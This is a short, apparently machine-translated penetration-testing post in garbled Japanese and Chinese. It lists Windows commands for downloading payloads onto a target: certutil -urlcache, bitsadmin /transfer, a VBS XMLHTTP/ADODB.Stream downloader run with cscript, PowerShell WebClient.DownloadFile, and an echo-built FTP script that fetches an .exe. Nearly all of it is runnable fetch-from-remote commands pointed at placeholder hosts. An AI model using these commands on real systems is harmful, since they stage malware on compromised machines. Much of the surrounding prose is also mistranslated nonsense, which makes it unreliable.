今日、侵入テストファイルCMDのインタビューは、彼が唯一の書いたことを述べたダウンロードJSとのcertutil、自身がこのレコードと次の要約を思いついたいくつかの一般的な方法があります。
(それはあまりにも、まだあまりにも多くのジャンクフードです。)
0x01でのcertutil
certutilの証明書は、その機能は非常に豊富で、多くのパラメータツールです。
certutilの-urlcache -split -fます。http:// XXXXXX -urlcache -split -f HTTPSのcertutil:// xxxxxxの1.TXT#保存するファイル名を指定します
0x02というbitsadmin
bitsadmin /転送Nのhttp:// www.xx.com/index.txt K:\ 111.txt
0x03のVBS
VBSが、ここで使用されるコードをダウンロードしてください:
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
利用csript:执行脚本文件
K:\>cscript 1.vbs http://xxxxxx/index.txt 111.txt
0x04 powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xx.com/index.txt','K:\111.txt')
0x05 ftp
echo open 8.8.8.8 >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt ftp -A -s:a.txt
今天出去喝了点酒 还有几种渗透环境中下载payload的方式 先睡了。。